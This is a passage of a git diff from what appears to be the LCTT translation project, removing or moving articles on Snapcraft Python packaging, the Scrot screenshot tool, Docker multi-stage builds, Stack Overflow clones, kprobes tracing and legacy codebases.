Python module requirements. youtube-dl uses Python 3 and has system package requirements, in this case `ffmpeg`. - -### offlineimap - -Snaps are defined in a single yaml file placed in the root of your project. The offlineimap example shows the entire `snapcraft.yaml` for an existing project. We’ll break this down. - -``` -name: offlineimap -version: git -summary: OfflineIMAP -description: | - OfflineIMAP is software that downloads your email mailbox(es) as local - Maildirs. OfflineIMAP will synchronize both sides via IMAP. - -grade: devel -confinement: devmode - -apps: - offlineimap: - command: bin/offlineimap - -parts: - offlineimap: - plugin: python - python-version: python2 - source: . - -``` - -#### Metadata - -The `snapcraft.yaml` starts with a small amount of human-readable metadata, which usually can be lifted from the GitHub description or project README.md. This data is used in the presentation of your app in the Snap Store. The `summary:` can not exceed 79 characters. You can use a pipe with the `description:` to declare a multi-line description. - -``` -name: offlineimap -version: git -summary: OfflineIMAP -description: | - OfflineIMAP is software that downloads your email mailbox(es) as local - Maildirs. OfflineIMAP will synchronize both sides via IMAP. - -``` - -#### Confinement - -To get started we won’t confine this application. Unconfined applications, specified with `devmode`, can only be released to the hidden “edge” channel where you and other developers can install them. - -``` -confinement: devmode - -``` - -#### Parts - -Parts define how to build your app. Parts can be anything: programs, libraries, or other assets needed to create and run your application. In this case we have one: the offlineimap source code. In other cases these can point to local directories, remote git repositories, or tarballs. - -The Python plugin will also bundle Python in the snap, so you can be sure that the version of Python you test against is included with your app. Dependencies from `install_requires` in your `setup.py` will also be bundled. Dependencies from a `requirements.txt` file can also be bundled using the `requirements:` option. - -``` -parts: - offlineimap: - plugin: python - python-version: python2 - source: . - -``` - -#### Apps - -Apps are the commands and services exposed to end users. If your command name matches the snap `name`, users will be able run the command directly. If the names differ, then apps are prefixed with the snap `name`(`offlineimap.command-name`, for example). This is to avoid conflicting with apps defined by other installed snaps. - -If you don’t want your command prefixed you can request an alias for it on the [Snapcraft forum][1]. These command aliases are set up automatically when your snap is installed from the Snap Store. - -``` -apps: - offlineimap: - command: bin/offlineimap - -``` - -If your application is intended to run as a service, add the line `daemon: simple` after the command keyword. This will automatically keep the service running on install, update and reboot. - -### Building the snap - -You’ll first need to [install snap support][2], and then install the snapcraft tool: - -``` -sudo snap install --beta --classic snapcraft - -``` - -If you have just installed snap support, start a new shell so your `PATH` is updated to include `/snap/bin`. You can then build this example yourself: - -``` -git clone https://github.com/snapcraft-docs/offlineimap -cd offlineimap -snapcraft - -``` - -The resulting snap can be installed locally. This requires the `--dangerous` flag because the snap is not signed by the Snap Store. The `--devmode` flag acknowledges that you are installing an unconfined application: - -``` -sudo snap install offlineimap_*.snap --devmode --dangerous - -``` - -You can then try it out: - -``` -offlineimap - -``` - -Removing the snap is simple too: - -``` -sudo snap remove offlineimap - -``` - -Jump ahead to [Share with your friends][3] or continue to read another example. - -### youtube-dl - -The youtube-dl example shows a `snapcraft.yaml` using a tarball of a Python application and `ffmpeg` bundled in the snap to satisfy the runtime requirements. Here is the entire `snapcraft.yaml` for youtube-dl. We’ll break this down. - -``` -name: youtube-dl -version: 2017.06.18 -summary: YouTube Downloader. -description: | - youtube-dl is a small command-line program to download videos from - YouTube.com and a few more sites. - -grade: devel -confinement: devmode - -parts: - youtube-dl: - source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz - plugin: python - python-version: python3 - after: [ffmpeg] - -apps: - youtube-dl: - command: bin/youtube-dl - -``` - -#### Parts - -The `$SNAPCRAFT_PROJECT_VERSION` variable is derived from the `version:` stanza and used here to reference the matching release tarball. Because the `python` plugin is used, snapcraft will bundle a copy of Python in the snap using the version specified in the `python-version:` stanza, in this case Python 3. - -youtube-dl makes use of `ffmpeg` to transcode or otherwise convert the audio and video file it downloads. In this example, youtube-dl is told to build after the `ffmpeg` part. Because the `ffmpeg` part specifies no plugin, it will be fetched from the parts repository. This is a collection of community-contributed definitions which can be used by anyone when building a snap, saving you from needing to specify the source and build rules for each system dependency. You can use `snapcraft search` to find more parts to use and `snapcraft define ` to verify how the part is defined. - -``` -parts: - youtube-dl: - source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz - plugin: python - python-version: python3 - after: [ffmpeg] - -``` - -### Building the snap - -You can build this example yourself by running the following: - -``` -git clone https://github.com/snapcraft-docs/youtube-dl -cd youtube-dl -snapcraft - -``` - -The resulting snap can be installed locally. This requires the `--dangerous` flag because the snap is not signed by the Snap Store. The `--devmode` flag acknowledges that you are installing an unconfined application: - -``` -sudo snap install youtube-dl_*.snap --devmode --dangerous - -``` - -Run the command: - -``` -youtube-dl “https://www.youtube.com/watch?v=k-laAxucmEQ” - -``` - -Removing the snap is simple too: - -``` -sudo snap remove youtube-dl - -``` - -### Share with your friends - -To share your snaps you need to publish them in the Snap Store. First, create an account on [the dashboard][4]. Here you can customize how your snaps are presented, review your uploads and control publishing. - -You’ll need to choose a unique “developer namespace” as part of the account creation process. This name will be visible by users and associated with your published snaps. - -Make sure the `snapcraft` command is authenticated using the email address attached to your Snap Store account: - -``` -snapcraft login - -``` - -### Reserve a name for your snap - -You can publish your own version of a snap, provided you do so under a name you have rights to. - -``` -snapcraft register mypythonsnap - -``` - -Be sure to update the `name:` in your `snapcraft.yaml` to match this registered name, then run `snapcraft` again. - -### Upload your snap - -Use snapcraft to push the snap to the Snap Store. - -``` -snapcraft push --release=edge mypthonsnap_*.snap - -``` - -If you’re happy with the result, you can commit the snapcraft.yaml to your GitHub repo and [turn on automatic builds][5] so any further commits automatically get released to edge, without requiring you to manually build locally. - -### Further customisations - -Here are all the Python plugin-specific keywords: - -``` -- requirements: - (string) - Path to a requirements.txt file -- constraints: - (string) - Path to a constraints file -- process-dependency-links: - (bool; default: false) - Enable the processing of dependency links in pip, which allow one project - to provide places to look for another project -- python-packages: - (list) - A list of dependencies to get from PyPI -- python-version: - (string; default: python3) - The python version to use. Valid options are: python2 and python3 - -``` - -You can view them locally by running: - -``` -snapcraft help python - -``` - -### Extending and overriding behaviour - -You can [extend the behaviour][6] of any part in your `snapcraft.yaml` with shell commands. These can be run after pulling the source code but before building by using the `prepare` keyword. The build process can be overridden entirely using the `build` keyword and shell commands. The `install` keyword is used to run shell commands after building your code, useful for making post build modifications such as relocating build assets. - -Using the youtube-dl example above, we can run the test suite at the end of the build. If this fails, the snap creation will be terminated: - -``` -parts: - youtube-dl: - source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz - plugin: python - python-version: python3 - stage-packages: [ffmpeg, python-nose] - install: | - nosetests -``` - --------------------------------------------------------------------------------- - -via: https://docs.snapcraft.io/build-snaps/python - -作者:[Snapcraft.io ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:Snapcraft.io - -[1]:https://forum.snapcraft.io/t/process-for-reviewing-aliases-auto-connections-and-track-requests/455 -[2]:https://docs.snapcraft.io/core/install -[3]:https://docs.snapcraft.io/build-snaps/python#share-with-your-friends -[4]:https://dashboard.snapcraft.io/openid/login/?next=/dev/snaps/ -[5]:https://build.snapcraft.io/ -[6]:https://docs.snapcraft.io/build-snaps/scriptlets diff --git a/sources/tech/20171202 Scrot Linux command-line screen grabs made simple b/sources/tech/20171202 Scrot Linux command-line screen grabs made simple deleted file mode 100644 index 979ed86b3c..0000000000 --- a/sources/tech/20171202 Scrot Linux command-line screen grabs made simple +++ /dev/null @@ -1,72 +0,0 @@ -Translating by filefi - -# Scrot: Linux command-line screen grabs made simple - -by [Scott Nesbitt][a] · November 30, 2017 - -> Scrot is a basic, flexible tool that offers a number of handy options for taking screen captures from the Linux command line. - -[![Original photo by Rikki Endsley. CC BY-SA 4.0](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A)][1] - - - -There are great tools on the Linux desktop for taking screen captures, such as [KSnapshot][2] and [Shutter][3]. Even the simple utility that comes with the GNOME desktop does a pretty good job of capturing screens. But what if you rarely need to take screen captures? Or you use a Linux distribution without a built-in capture tool, or an older computer with limited resources? - -Turn to the command line and a little utility called [Scrot][4]. It does a fine job of taking simple screen captures, and it includes a few features that might surprise you. - -### Getting started with Scrot -Many Linux distributions come with Scrot already installed—to check, type `which scrot`. If it isn't there, you can install Scrot using your distro's package manager. If you're willing to compile the code, grab it [from GitHub][5]. - -To take a screen capture, crack open a terminal window and type `scrot [filename]`, where `[filename]` is the name of file to which you want to save the image (for example, `desktop.png`). If you don't include a name for the file, Scrot will create one for you, such as `2017-09-24-185009_1687x938_scrot.png`. (That filename isn't as descriptive it could be, is it? That's why it's better to add one to the command.) - -Running Scrot with no options takes a screen capture of your entire desktop. If you don't want to do that, Scrot lets you focus on smaller portions of your screen. - -### Taking a screen capture of a single window - -Tell Scrot to take a screen capture of a single window by typing `scrot -u [filename]`. - -The `-u` option tells Scrot to grab the window currently in focus. That's usually the terminal window you're working in, which might not be the one you want. - -To grab another window on your desktop, type `scrot -s [filename]`. - -The `-s` option lets you do one of two things: - -* select an open window, or - -* draw a rectangle around a window or a portion of a window to capture it. - -You can also set a delay, which gives you a little more time to select the window you want to capture. To do that, type `scrot -u -d [num] [filename]`. - -The `-d` option tells Scrot to wait before grabbing the window, and `[num]` is the number of seconds to wait. Specifying `-d 5` (wait five seconds) should give you enough time to choose a window. - -### More useful options - -Scrot offers a number of additional features (most of which I never use). The ones I find most useful include: - -* `-b` also grabs the window's border - -* `-t` grabs a window and creates a thumbnail of it. This can be useful when you're posting screen captures online. - -* `-c` creates a countdown in your terminal when you use the `-d` option. - -To learn about Scrot's other options, check out the its documentation by typing `man scrot` in a terminal window, or [read it online][6]. Then start snapping images of your screen. - -It's basic, but Scrot gets the job done nicely. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot - -作者:[Scott Nesbitt][a] -译者:[filefi](https://github.com/filefi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/scottnesbitt -[1]:https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A -[2]:https://www.kde.org/applications/graphics/ksnapshot/ -[3]:https://launchpad.net/shutter -[4]:https://github.com/dreamer/scrot -[5]:http://manpages.ubuntu.com/manpages/precise/man1/scrot.1.html -[6]:https://github.com/dreamer/scrot diff --git a/sources/tech/20171202 docker - Use multi-stage builds.md b/sources/tech/20171202 docker - Use multi-stage builds.md deleted file mode 100644 index e1a6414862..0000000000 --- a/sources/tech/20171202 docker - Use multi-stage builds.md +++ /dev/null @@ -1,127 +0,0 @@ -Use multi-stage builds -============================================================ - -Multi-stage builds are a new feature requiring Docker 17.05 or higher on the daemon and client. Multistage builds are useful to anyone who has struggled to optimize Dockerfiles while keeping them easy to read and maintain. - -> Acknowledgment: Special thanks to [Alex Ellis][1] for granting permission to use his blog post [Builder pattern vs. Multi-stage builds in Docker][2] as the basis of the examples below. - -### Before multi-stage builds - -One of the most challenging things about building images is keeping the image size down. Each instruction in the Dockerfile adds a layer to the image, and you need to remember to clean up any artifacts you don’t need before moving on to the next layer. To write a really efficient Dockerfile, you have traditionally needed to employ shell tricks and other logic to keep the layers as small as possible and to ensure that each layer has the artifacts it needs from the previous layer and nothing else. - -It was actually very common to have one Dockerfile to use for development (which contained everything needed to build your application), and a slimmed-down one to use for production, which only contained your application and exactly what was needed to run it. This has been referred to as the “builder pattern”. Maintaining two Dockerfiles is not ideal. - -Here’s an example of a `Dockerfile.build` and `Dockerfile` which adhere to the builder pattern above: - -`Dockerfile.build`: - -``` -FROM golang:1.7.3 -WORKDIR /go/src/github.com/alexellis/href-counter/ -RUN go get -d -v golang.org/x/net/html -COPY app.go . -RUN go get -d -v golang.org/x/net/html \ - && CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . - -``` - -Notice that this example also artificially compresses two `RUN` commands together using the Bash `&&` operator, to avoid creating an additional layer in the image. This is failure-prone and hard to maintain. It’s easy to insert another command and forget to continue the line using the `\` character, for example. - -`Dockerfile`: - -``` -FROM alpine:latest -RUN apk --no-cache add ca-certificates -WORKDIR /root/ -COPY app . -CMD ["./app"] - -``` - -`build.sh`: - -``` -#!/bin/sh -echo Building alexellis2/href-counter:build - -docker build --build-arg https_proxy=$https_proxy --build-arg http_proxy=$http_proxy \ - -t alexellis2/href-counter:build . -f Dockerfile.build - -docker create --name extract alexellis2/href-counter:build -docker cp extract:/go/src/github.com/alexellis/href-counter/app ./app -docker rm -f extract - -echo Building alexellis2/href-counter:latest - -docker build --no-cache -t alexellis2/href-counter:latest . -rm ./app - -``` - -When you run the `build.sh` script, it needs to build the first image, create a container from it in order to copy the artifact out, then build the second image. Both images take up room on your system and you still have the `app` artifact on your local disk as well. - -Multi-stage builds vastly simplify this situation! - -### Use multi-stage builds - -With multi-stage builds, you use multiple `FROM` statements in your Dockerfile. Each `FROM` instruction can use a different base, and each of them begins a new stage of the build. You can selectively copy artifacts from one stage to another, leaving behind everything you don’t want in the final image. To show how this works, Let’s adapt the Dockerfile from the previous section to use multi-stage builds. - -`Dockerfile`: - -``` -FROM golang:1.7.3 -WORKDIR /go/src/github.com/alexellis/href-counter/ -RUN go get -d -v golang.org/x/net/html -COPY app.go . -RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . - -FROM alpine:latest -RUN apk --no-cache add ca-certificates -WORKDIR /root/ -COPY --from=0 /go/src/github.com/alexellis/href-counter/app . -CMD ["./app"] - -``` - -You only need the single Dockerfile. You don’t need a separate build script, either. Just run `docker build`. - -``` -$ docker build -t alexellis2/href-counter:latest . - -``` - -The end result is the same tiny production image as before, with a significant reduction in complexity. You don’t need to create any intermediate images and you don’t need to extract any artifacts to your local system at all. - -How does it work? The second `FROM` instruction starts a new build stage with the `alpine:latest` image as its base. The `COPY --from=0` line copies just the built artifact from the previous stage into this new stage. The Go SDK and any intermediate artifacts are left behind, and not saved in the final image. - -### Name your build stages - -By default, the stages are not named, and you refer to them by their integer number, starting with 0 for the first `FROM` instruction. However, you can name your stages, by adding an `as ` to the `FROM` instruction. This example improves the previous one by naming the stages and using the name in the `COPY` instruction. This means that even if the instructions in your Dockerfile are re-ordered later, the `COPY` won’t break. - -``` -FROM golang:1.7.3 as builder -WORKDIR /go/src/github.com/alexellis/href-counter/ -RUN go get -d -v golang.org/x/net/html -COPY app.go . -RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . - -FROM alpine:latest -RUN apk --no-cache add ca-certificates -WORKDIR /root/ -COPY --from=builder /go/src/github.com/alexellis/href-counter/app . -CMD ["./app"] -``` - --------------------------------------------------------------------------------- - -via: https://docs.docker.com/engine/userguide/eng-image/multistage-build/#name-your-build-stages - -作者:[docker docs ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://docs.docker.com/engine/userguide/eng-image/multistage-build/ -[1]:https://twitter.com/alexellisuk -[2]:http://blog.alexellis.io/mutli-stage-docker-builds/ diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md deleted file mode 100644 index 670be95353..0000000000 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ /dev/null @@ -1,99 +0,0 @@ -我号召黑客新闻的理由之一 -实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? -不,你没有。 -我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间,这是程序员永远的 -乐观主义。 -- Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 - -指责开源软件的使用存在着高昂的代价已经不是一个新论点了,它之前就被提过,而且说的比我更有信服力,即使一些人已经在高度赞扬开源软件的运作。 -这种事为什么会重复发生? - -在周一的黑客新闻上,我愉悦地看着某些人一边说写 Stack Overflow 简单的简直搞笑,一边通过允许七月第四个周末之后的克隆来开始备份他们的提问。 -其他的声明中也指出现存的克隆是一个好的出发点。 - -让我们假设,为了争辩,你觉得将自己的 Stack Overflow 通过 ASP.NET 和 MVC 克隆是正确的,然后被一块廉价的手表和一个小型俱乐部头领忽悠之后, -决定去手动拷贝你 Stack Overflow 的源代码,一页又一页,所以你可以逐字逐句地重新输入,我们同样会假定你像我一样打字,很酷的有 100 WPM -(差不多每秒8个字符),不和我一样的话,你不会犯错。 - - Stack Overflow 的 *.cs、*.sql、*.css、*.js 和 *.aspx 文件大约 2.3 MB,因此如果你想将这些源代码输进电脑里去的话,即使你不犯错也需要大约 80 个小时。 - -除非......当然,你是不会那样做的:你打算从头开始实现 Stack Overflow 。所以即使我们假设,你花了十倍的时间去设计、输出,然后调试你自己的实现而不是去拷 -贝已有的那份,那已经让你已经编译了好几个星期。我不知道你,但是我可以承认我写的新代码大大小于我复制的现有代码的十分之一。 - -好,ok,我听见你松了口气。所以不是全部。但是我可以做大部分。 - -行,所以什么是大部分?这只是询问和回答问题,这个部分很简单。那么,除了你必须实现对问题和答案投票、赞同还是反对,而且提问者应该能够去接收每一个问题的 -单一答案。你不能让人们赞同或者反对他们自己的回答。所以你需要去阻止。你需要去确保用户在一定的时间内不会赞同或反对其他用户太多次。以预防垃圾邮件, -你可能也需要去实现一个垃圾邮件过滤器,即使在一个基本的设计里,也要考虑到这一点。而且还需要去支持用户图标。并且你将不得不寻找一个自己真正信任的并且 -与 markdown 接合很好的 HTML 库(当然,你确实希望重新使用那个令人敬畏的编辑器 Stack Overflow ),你还需要为所有控件购买,设计或查找小部件,此外 -你至少需要一个基本的管理界面,以便用户可以调节,并且你需要实现可扩展的业务量,以便能稳定地给用户越来越多的功能去实现他们想做的。 - -如果你这样做了,你可以完成它。 - -除了...除了全文检索外,特别是它在“寻找问题”功能中的表现,这是必不可少的。然后用户的基本信息,和回答的意见,然后有一个主要展示你的重要问题, -但是它会稳定的冒泡式下降。另外你需要去实现奖励,并支持每个用户的多个 OpenID 登录,然后为相关的事件发送邮件通知,并添加一个标签系统, -接着允许管理员通过一个不错的图形界面配置徽章。你需要去显示用户的 karma 历史,点赞和差评。整个事情的规模都非常好,因为它随时都可以被 - slashdotted、reddited 或是 Stack Overflow 。 - -在这之后!你就已经完成了! - -...在正确地实现升级、国际化、业绩上限和一个 css 设计之后,使你的站点看起来不像是一个屁股,上面的大部分 AJAX 版本和 G-d 知道什么会同样潜伏 -在你所信任的界面下,但是当你开始做一个真正的克隆的时候,就会遇到它。 - -告诉我:这些功能中哪个是你感觉可以削减而让它仍然是一个引人注目的产品,哪些是大部分网站之下的呢?哪个你可以剔除呢? - -开发者因为开源软件的使用是一个可怕的痛苦这样一个相同的理由认为克隆一个像 Stack Overflow 的站点很简单。当你把一个开发者放在 Stack Overflow 前面, -他们并不真的看到 Stack Overflow,他们实际上看的是这些: - -create table QUESTION (ID identity primary key, - TITLE varchar(255), --- 为什么我知道你认为是 255 - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - USER integer references USER(ID)); -create table RESPONSE (ID identity primary key, - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - QUESTION integer references QUESTION(ID)) - -如果你告诉一个开发者去复制 Stack Overflow ,进入他脑海中的就是上面的两个 SQL 表和足够的 HTML 文件来显示它们,而不用格式化,这在一个周末里是完全 -可以实现的,聪明的人会意识到他们需要实现登陆、注销和评论,点赞需要绑定到用户。但是这在一个周末内仍然是完全可行的。这仅仅是在 SQL 后端里加上两张 -左右的表,而 HTML 则用来展示内容,使用像 Django 这样的框架,你甚至可以免费获得基本的用户和评论。 - -但是那不是和 Stack Overflow 相关的,无论你对 Stack Overflow 的感受如何,大多数访问者似乎都认为用户体验从头到尾都很流畅,他们感觉他们和一个 -好产品相互影响。即使我没有更好的了解,我也会猜测 Stack Overflow 在数据库模式方面取得了持续的成功-并且有机会去阅读 Stack Overflow 的源代码, -我知道它实际上有多么的小,这些是一个极大的 spit 和 Polish 的集合,成为了一个具有高可用性的主要网站,一个开发者,问一个东西被克隆有多难, -仅仅不认为和 Polish 相关,因为 Polish 是实现结果附带的。 - -这就是为什么 Stack Overflow 的开放源代码克隆会失败,即使一些人在设法实现大部分 Stack Overflow 的“规范”,也会有一些关键区域会将他们绊倒, -举个例子,如果你把目标市场定在了终端用户上,你要么需要一个图形界面去配置规则,要么聪明的开发者会决定哪些徽章具有足够的通用性,去继续所有的 -安装,实际情况是,开发者发牢骚和抱怨你不能实现一个真实的综合性的像 badges 的图形用户界面,然后 bikeshed 任何的建议,为因为标准的 badges -在范围内太远,他们会迅速避开选择其他方向,他们最后会带着相同的有 bug 追踪器的解决方案赶上,就像他们工作流程的概要使用一样: -开发者通过任意一种方式实现一个通用的机制,任何一个人完全都能轻松地使用 Python、PHP 或任意一门语言中的系统 API 来工作,能简单为他们自己增加 -自定义设置,PHP 和 Python 是学起来很简单的,并且比起曾经的图形界面更加的灵活,为什么还要操心其他事呢? - -同样的,节制和管理界面可以被削减。如果你是一个管理员,你可以进入 SQL 服务器,所以你可以做任何真正的管理-就像这样,管理员可以通过任何的 Django -管理和类似的系统给你提供支持,因为,毕竟只有少数用户是 mods,mods 应该理解网站是怎么运作、停止的。当然,没有 Stack Overflow 的接口失败会被纠正 -,即使 Stack Overflow 的愚蠢的要求,你必须知道如何去使用 openID (它是最糟糕的缺点)最后得到修复。我确信任何的开源的克隆都会狂热地跟随它- -即使 GNOME 和 KDE 多年来亦步亦趋地复制 windows ,而不是尝试去修复它自己最明显的缺陷。 - -开发者可能不会关心应用的这些部分,但是最终用户会,当他们尝试去决定使用哪个应用时会去考虑这些。就好像一家好的软件公司希望通过确保其产品在出货之前 -是一流的来降低其支持成本一样,所以,同样的,懂行的消费者想在他们购买这些产品之前确保产品好用,以便他们不需要去寻求帮助,开源产品就失败在这种地方 -,一般来说,专有解决方案会做得更好。 - -这不是说开源软件没有他们自己的立足之地,这个博客运行在 Apache,Django,PostgreSQL 和 Linux 上。但是让我告诉你,配置这些堆栈不是为了让人心灰意懒 -,PostgreSQL 需要在老版本上移除设置。然后,在 Ubuntu 和 FreeBSD 最新的版本上,仍然要求用户搭建第一个数据库集群,MS SQL不需要这些东西,Apache... -天啊,甚至没有让我开始尝试去向一个初学者用户解释如何去得到虚拟机,MovableType,一对 Django 应用程序,而且所有的 WordPress 都可以在一个单一的安装下 -顺利运行,像在地狱一样,只是试图解释 Apache 的分叉线程变换给技术上精明的非开发人员就是一个噩梦,IIS 7 和操作系统的 Apache 服务器是非常闭源的, -图形界面管理程序配置这些这些相同的堆栈非常的简单,Django 是一个伟大的产品,但是它只是基础架构而已,我认为开源软件做的很好,恰恰是因为推动开发者去 -贡献的动机 - -下次你看见一个你喜欢的应用,认为所有面向用户的细节非常长和辛苦,就会去让它用起来更令人开心,在谴责你如何能普通的实现整个的可恶的事在一个周末, -十分之九之后,当你认为一个应用的实现简单地简直可笑,你就完全的错失了故事另一边的用户 - -via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ - -作者:Benjamin Pollack 译者:hopefully2333 校对:校对者ID - -本文由 LCTT 原创编译,Linux中国 荣誉推出 diff --git a/published/20161216 Kprobes Event Tracing on ARMv8.md b/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md similarity index 98% rename from published/20161216 Kprobes Event Tracing on ARMv8.md rename to translated/tech/20161216 Kprobes Event Tracing on ARMv8.md index 3985f064dc..3c3ab0de5b 100644 --- a/published/20161216 Kprobes Event Tracing on ARMv8.md +++ b/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md @@ -29,19 +29,19 @@ jprobes 允许通过提供一个具有相同调用签名call signature kprobes 提供一系列能从内核代码中调用的 API 来设置探测点和当探测点被命中时调用的注册函数。在不往内核中添加代码的情况下,kprobes 也是可用的,这是通过写入特定事件追踪的 debugfs 文件来实现的,需要在文件中设置探针地址和信息,以便在探针被命中时记录到追踪日志中。后者是本文将要讨论的重点。最后 kprobes 可以通过 perl 命令来使用。 -#### kprobes API +### kprobes API 内核开发人员可以在内核中编写函数(通常在专用的调试模块中完成)来设置探测点,并且在探测指令执行前和执行后立即执行任何所需操作。这在 kprobes.txt 中有很好的解释。 -#### 事件追踪 +### 事件追踪 事件追踪子系统有自己的自己的文档^注2 ,对于了解一般追踪事件的背景可能值得一读。事件追踪子系统是追踪点tracepoints和 kprobes 事件追踪的基础。事件追踪文档重点关注追踪点,所以请在查阅文档时记住这一点。kprobes 与追踪点不同的是没有预定义的追踪点列表,而是采用动态创建的用于触发追踪事件信息收集的任意探测点。事件追踪子系统通过一系列 debugfs 文件来控制和监视。事件追踪(`CONFIG_EVENT_TRACING`)将在被如 kprobe 事件追踪子系统等需要时自动选择。 -##### kprobes 事件 +#### kprobes 事件 使用 kprobes 事件追踪子系统,用户可以在内核任意断点处指定要报告的信息,只需要指定任意现有可探测指令的地址以及格式化信息即可确定。在执行过程中遇到断点时,kprobes 将所请求的信息传递给事件追踪子系统的公共部分,这些部分将数据格式化并追加到追踪日志中,就像追踪点的工作方式一样。kprobes 使用一个类似的但是大部分是独立的 debugfs 文件来控制和显示追踪事件信息。该功能可使用 `CONFIG_KPROBE_EVENT` 来选择。Kprobetrace 文档^ 注3 提供了如何使用 kprobes 事件追踪的基本信息,并且应当被参考用以了解以下介绍示例的详细信息。 -#### kprobes 和 perf +### kprobes 和 perf perf 工具为 kprobes 提供了另一个命令行接口。特别地,`perf probe` 允许探测点除了由函数名加偏移量和地址指定外,还可由源文件和行号指定。perf 接口实际上是使用 kprobes 的 debugfs 接口的封装器。 @@ -60,7 +60,7 @@ perf 工具为 kprobes 提供了另一个命令行接口。特别地,`perf pro kprobes 的一个常用例子是检测函数入口和/或出口。因为只需要使用函数名来作为探针地址,它安装探针特别简单。kprobes 事件追踪将查看符号名称并且确定地址。ARMv8 调用标准定义了函数参数和返回值的位置,并且这些可以作为 kprobes 事件处理的一部分被打印出来。 -#### 例子: 函数入口探测 +### 例子: 函数入口探测 检测 USB 以太网驱动程序复位功能: @@ -94,7 +94,7 @@ kworker/0:0-4 [000] d… 10972.102939: p_ax88772_reset_0: 这里我们可以看见传入到我们的探测函数的指针参数的值。由于我们没有使用 kprobes 事件追踪的可选标签功能,我们需要的信息自动被标注为 `arg1`。注意这指向我们需要 kprobes 记录这个探针的一组值的第一个,而不是函数参数的实际位置。在这个例子中它也只是碰巧是我们探测函数的第一个参数。 -#### 例子: 函数入口和返回探测 +### 例子: 函数入口和返回探测 kretprobe 功能专门用于探测函数返回。在函数入口 kprobes 子系统将会被调用并且建立钩子以便在函数返回时调用,钩子将记录需求事件信息。对最常见情况,返回信息通常在 `X0` 寄存器中,这是非常有用的。在 `%x0` 中返回值也可以被称为 `$retval`。以下例子也演示了如何提供一个可读的标签来展示有趣的信息。 @@ -132,7 +132,7 @@ _$ cat trace bash-1671 [001] d..1 214.401975: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x726_ ``` -#### 例子: 解引用指针参数 +### 例子: 解引用指针参数 对于指针值,kprobes 事件处理子系统也允许解引用和打印所需的内存内容,适用于各种基本数据类型。为了展示所需字段,手动计算结构的偏移量是必要的。 @@ -173,7 +173,7 @@ $ cat trace bash-1702 [002] d..1 175.347349: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0xfffffffffffffff6 ``` -#### 例子: 探测任意指令地址 +### 例子: 探测任意指令地址 在前面的例子中,我们已经为函数的入口和出口插入探针,然而探测一个任意指令(除少数例外)是可能的。如果我们正在 C 函数中放置一个探针,第一步是查看代码的汇编版本以确定我们要放置探针的位置。一种方法是在 vmlinux 文件上使用 gdb,并在要放置探针的函数中展示指令。下面是一个在 `arch/arm64/kernel/modules.c` 中 `module_alloc` 函数执行此操作的示例。在这种情况下,因为 gdb 似乎更喜欢使用弱符号定义,并且它是与这个函数关联的存根代码,所以我们从 System.map 中来获取符号值: diff --git a/translated/tech/20170530 How to Improve a Legacy Codebase.md b/translated/tech/20170530 How to Improve a Legacy Codebase.md deleted file mode 100644 index a1869b0449..0000000000 --- a/translated/tech/20170530 How to Improve a Legacy Codebase.md +++ /dev/null @@ -1,104 +0,0 @@ -# 如何改善遗留的代码库 - -这在每一个程序员,项目管理员,团队领导的一生中都会至少发生一次。原来的程序员早已离职去度假了,留下了一坨几百万行屎一样的代码和文档(如果有的话),一旦接手这些代码,想要跟上公司的进度简直让人绝望。 - -你的工作是带领团队摆脱这个混乱的局面 - -当你的第一反应过去之后,你开始去熟悉这个项目,公司的管理层都在关注着你,所以项目只能成功,然而,看了一遍代码之后却发现很大的可能会失败。那么该怎么办呢? - -幸运(不幸)的是我已经遇到好几次这种情况了,我和我的小伙伴发现将这坨热气腾腾的屎变成一个健康可维护的项目是非常值得一试的。下面这些是我们的一些经验: - -### 备份 - -在开始做任何事情之前备份与之可能相关的所有文件。这样可以确保不会丢失任何可能会在另外一些地方很重要的信息。一旦修改其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题,配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方吧,除非这些文件是只读模式否则不要轻易碰它。 - -### 必须确保代码能够在生产环境下构建运行并产出,这是重要的先决条件。 - -之前我假设环境已经存在,所以完全丢了这一步,Hacker News 